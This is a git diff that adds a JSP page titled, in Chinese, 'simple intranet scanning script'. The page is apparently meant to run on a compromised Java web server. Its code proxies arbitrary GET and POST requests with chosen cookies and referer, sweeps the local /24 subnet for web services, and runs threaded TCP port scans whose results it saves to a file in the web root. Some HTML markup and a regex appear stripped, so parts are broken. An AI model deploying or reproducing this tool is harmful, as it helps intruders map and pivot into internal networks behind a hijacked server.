diff --git a/jsp/netspy/netspy.jsp b/jsp/netspy/netspy.jsp new file mode 100644 index 0000000..1a049b1 --- /dev/null +++ b/jsp/netspy/netspy.jsp @@ -0,0 +1,563 @@ +<%@page import="org.apache.commons.io.FileUtils"%> +<%@page import="java.io.File"%> +<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> +<%@ page isThreadSafe="false"%> +<%@page import="java.net.*"%> +<%@page import="java.io.PrintWriter"%> +<%@page import="java.io.BufferedReader"%> +<%@page import="java.io.FileReader"%> +<%@page import="java.io.FileWriter"%> +<%@page import="java.io.OutputStreamWriter"%> +<%@page import="java.util.regex.Matcher"%> +<%@page import="java.io.IOException"%> +<%@page import="java.net.InetAddress"%> +<%@page import="java.util.regex.Pattern"%> +<%@page import="java.net.HttpURLConnection"%> +<%@page import="java.util.concurrent.LinkedBlockingQueue"%> + + +<%!final static List list = new ArrayList(); + String referer = ""; + String cookie = ""; + String decode = "utf-8"; + int thread = 100; + //final static List scanportlist = new ArrayList(); + String cpath=""; + + //建立一个HTTP连接 + HttpURLConnection getHTTPConn(String urlString) { + try { + java.net.URL url = new java.net.URL(urlString); + java.net.HttpURLConnection conn = (java.net.HttpURLConnection) url + .openConnection(); + conn.setRequestMethod("GET"); + conn.addRequestProperty("User-Agent", + "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon;)"); + conn.addRequestProperty("Accept-Encoding", "gzip"); + conn.addRequestProperty("referer", referer); + conn.addRequestProperty("cookie", cookie); + //conn.setInstanceFollowRedirects(false); + conn.setConnectTimeout(3000); + conn.setReadTimeout(3000); + + return conn; + } catch (Exception e) { + return null; + } + } + + String PostData(String urlString, String postString) { + HttpURLConnection http = null; + String response = null; + try { + java.net.URL url = new java.net.URL(urlString); + http = (HttpURLConnection) url.openConnection(); + http.setDoInput(true); + http.setDoOutput(true); + http.setUseCaches(false); + http.setConnectTimeout(50000); + http.setReadTimeout(50000); + http.setRequestMethod("POST"); + http.setRequestProperty("Content-Type", + "application/x-www-form-urlencoded"); + http.connect(); + OutputStreamWriter osw = new OutputStreamWriter( + http.getOutputStream(), decode); + osw.write(postString); + osw.flush(); + osw.close(); + response = getHtmlByInputStream(http.getInputStream(), decode); + } catch (Exception e) { + response = getHtmlByInputStream(http.getErrorStream(), decode); + } + return response; + } + + HttpURLConnection conn; + + //从输入流中读取源码 + String getHtmlByInputStream(java.io.InputStream is, String code) { + StringBuffer html = new StringBuffer(); + try { + + java.io.InputStreamReader isr = new java.io.InputStreamReader(is, + code); + java.io.BufferedReader br = new java.io.BufferedReader(isr); + String temp; + while ((temp = br.readLine()) != null) { + if (!temp.trim().equals("")) { + html.append(temp).append("\n"); + } + } + br.close(); + isr.close(); + } catch (Exception e) { + System.out.print(e.getMessage()); + } + + return html.toString(); + } + + //获取HTML源码 + String getHtmlContext(HttpURLConnection conn, String decode,boolean isError) { + Map result = new HashMap(); + String code = "utf-8"; + if (decode != null) { + code = decode; + } + try { + return getHtmlByInputStream(conn.getInputStream(), code); + } catch (Exception e) { + try { + if(isError){ + return getHtmlByInputStream(conn.getErrorStream(), code); + } + } catch (Exception e1) { + System.out.println("getHtmlContext2:" + e.getMessage()); + } + System.out.println("getHtmlContext:" + e.getMessage()); + return "null"; + } + } + + //获取Server头 + String getServerType(HttpURLConnection conn) { + try { + return conn.getHeaderField("Server"); + } catch (Exception e) { + return "null"; + } + + } + + //匹配标题 + String getTitle(String htmlSource) { + try { + List list = new ArrayList(); + String title = ""; + Pattern pa = Pattern.compile(".*?"); + Matcher ma = pa.matcher(htmlSource); + while (ma.find()) { + list.add(ma.group()); + } + for (int i = 0; i < list.size(); i++) { + title = title + list.get(i); + } + return title.replaceAll("<.*?>", ""); + } catch (Exception e) { + return null; + } + } + + //得到css + List getCss(String html, String url, String decode) { + List cssurl = new ArrayList(); + List csscode = new ArrayList(); + try { + + String title = ""; + Pattern pa = Pattern.compile(".*href=\"(.*)[.]css"); + Matcher ma = pa.matcher(html.toLowerCase()); + while (ma.find()) { + cssurl.add(ma.group(1) + ".css"); + } + + for (int i = 0; i < cssurl.size(); i++) { + String cssuuu = url + "/" + cssurl.get(i); + String csshtml = ""; + csscode.add(csshtml); + + } + } catch (Exception e) { + System.out.println("getCss:" + e.getMessage()); + } + return csscode; + + } + + //域名解析成IP + String getMyIPLocal() throws IOException { + InetAddress ia = InetAddress.getLocalHost(); + return ia.getHostAddress(); + } + + + + boolean getHostPort(String task){ + Socket client = null; + boolean isOpen=false; + try{ + String[] s=task.split(":"); + client = new Socket(s[0], Integer.parseInt(s[1])); + isOpen=true; + System.out.println("getHostPort:"+task); + //scanportlist.add(task+" >>> Open"); + saveScanReslt2(task+" >>> Open\r\n"); + }catch(Exception e){ + isOpen=false; + } + return isOpen; + } + + void getPath(String path){ + cpath=path; + } + +/* void saveScanReslt(String s){ + try{ + FileUtils.writeStringToFile(new File(cpath+"/port.txt"), s,"UTF-8",true); + }catch(Exception e){ + System.out.print(e.getLocalizedMessage()); + } + } */ + + void saveScanReslt2(String content) { + FileWriter writer = null; + try { + writer = new FileWriter(cpath+"/port.txt", true); + writer.write(content); + } catch (IOException e) { + System.out.print(e.getLocalizedMessage()); + } finally { + try { + if(writer != null){ + writer.close(); + } + } catch (IOException e) { + System.out.print(e.getLocalizedMessage()); + } + } + } + + + + String s="Result:
"; + String readPortResult(String portfile){ + File file = new File(portfile); + BufferedReader reader = null; + try { + System.out.println(""); + reader = new BufferedReader(new FileReader(file)); + String tempString = null; + while ((tempString = reader.readLine()) != null) { + s+=tempString+"
"; + } + reader.close(); + } catch (IOException e) { + return null; + } finally { + if (reader != null) { + try { + reader.close(); + } catch (IOException e1) { + return null; + } + } + } + return s; + } + + + %> + + + + + +内网简单扫描脚本 + + + +

+ 代理访问 Web扫描 端口扫描 +

+ +
+
+

+ Url: +

+

+ Method: Decode: +

+

+ + + +

+

+ Referer: +

+

+ +

+ +

+
+
+ + + + + +
+ + +<% + final JspWriter pwx = out; + String s = application.getRealPath("/") + "/port.txt"; + String result = readPortResult(s); + if (result != null) { + try { + pwx.println(result); + } catch (Exception e) { + System.out.print(e.getMessage()); + } + }else{ + pwx.println("如果你进行了端口扫描操作,那么这里将会显示扫描结果!
"); + } + String div1 = "
"; + String div2 = "
"; + + String u = request.getParameter("url"); + String ip = request.getParameter("ip"); + String scanip = request.getParameter("scanip"); + + if (u != null) { + + String post = request.getParameter("post"); + System.out.print(u); + System.out.print(post); + decode = request.getParameter("decode"); + String ref = request.getParameter("referer"); + String cook = request.getParameter("cookie"); + + if (ref != null) { + referer = ref; + } + if (cook != null) { + cookie = cook; + } + + String html = null; + + if (post != null) { + html = PostData(u, post); + } else { + html = getHtmlContext(getHTTPConn(u), decode, true); + } + + String reaplce = "href=\"http://127.0.0.1:8080/Jwebinfo/out.jsp?url="; + //html=html.replaceAll("href=['|\"]?http://(.*)['|\"]?", reaplce+"http://$1\""); + html = html.replaceAll("href=['|\"]?(?!http)(.*)['|\"]?", + reaplce + u + "$1"); + List css = getCss(html, u, decode); + String csshtml = ""; + if (!html.equals("null")) { + for (int i = 0; i < css.size(); i++) { + csshtml += css.get(i); + } + out.print(div1 + html + csshtml + div2); + } else { + response.setStatus(HttpServletResponse.SC_NOT_FOUND); + out.print("请求失败!"); + } + return; + } + + else if (ip != null) { + String threadpp = (request.getParameter("thread")); + String[] port = request.getParameter("port").split(","); + + if (threadpp != null) { + thread = Integer.parseInt(threadpp); + System.out.println(threadpp); + } + try { + try { + String http = "http://"; + String localIP = getMyIPLocal(); + if (ip != null) { + localIP = ip; + } + String useIP = localIP.substring(0, + localIP.lastIndexOf(".") + 1); + final Queue queue = new LinkedBlockingQueue(); + for (int i = 1; i <= 256; i++) { + for (int j = 0; j < port.length; j++) { + String url = http + useIP + i + ":" + port[j]; + queue.offer(url); + System.out.print(url); + } + + } + final JspWriter pw = out; + ThreadGroup tg = new ThreadGroup("c"); + for (int i = 0; i < thread; i++) { + new Thread(tg, new Runnable() { + public void run() { + while (true) { + String addr = queue.poll(); + if (addr != null) { + System.out.println(addr); + HttpURLConnection conn = getHTTPConn(addr); + String html = getHtmlContext(conn, + decode, false); + String title = getTitle(html); + String serverType = getServerType(conn); + String status = !html + .equals("null") ? "Success" + : "Fail"; + if (html != null + && !status.equals("Fail")) { + try { + pw.println(addr + " >> " + + title + ">>" + + serverType + + " >>" + status + + "
"); + } catch (Exception e) { + e.printStackTrace(); + } + } + } else { + return; + } + } + } + }).start(); + } + while (tg.activeCount() != 0) { + } + } catch (Exception e) { + e.printStackTrace(); + } + } catch (Exception e) { + out.println(e.toString()); + } + } else if (scanip != null) { + getPath(application.getRealPath("/")); + int thread = Integer.parseInt(request.getParameter("thread")); + String[] port = request.getParameter("scanport").split(","); + String ip1 = scanip; + String ip2 = request.getParameter("scanip2"); + + int start = Integer.parseInt(ip1.substring( + ip1.lastIndexOf(".") + 1, ip1.length())); + int end = Integer.parseInt(ip2.substring( + ip2.lastIndexOf(".") + 1, ip2.length())); + + String useIp = scanip.substring(0, scanip.lastIndexOf(".") + 1); + + System.out.println("start:" + start); + System.out.println("end:" + end); + + final Queue queue = new LinkedBlockingQueue(); + for (int i = start; i <= end; i++) { + for (int j = 0; j < port.length; j++) { + String scantarget = useIp + i + ":" + port[j]; + queue.offer(scantarget); + //System.out.println(scantarget); + } + + } + System.out.print("Count1:" + queue.size()); + final JspWriter pw = out; + ThreadGroup tg = new ThreadGroup("c"); + for (int i = 0; i < thread; i++) { + new Thread(tg, new Runnable() { + public void run() { + while (true) { + String scantask = queue.poll(); + if (scantask != null) { + getHostPort(scantask); + /* String result = null; + if(isOpen){ + result=scantask+ " >>> Open
"; + scanportlist.add(result); + System.out.println(result); + } */ + + /* try { + pw.println(result); + } catch (Exception e) { + System.out.print(e.getMessage()); + } */ + } + } + } + }).start(); + + } + /* while (tg.activeCount() != 0) { + } */ + try { + pw.println("扫描线程已经开始,请查看" + cpath+"/port.txt文件或者直接刷新本页面!"); + } catch (Exception e) { + System.out.print(e.getMessage()); + } + } +%>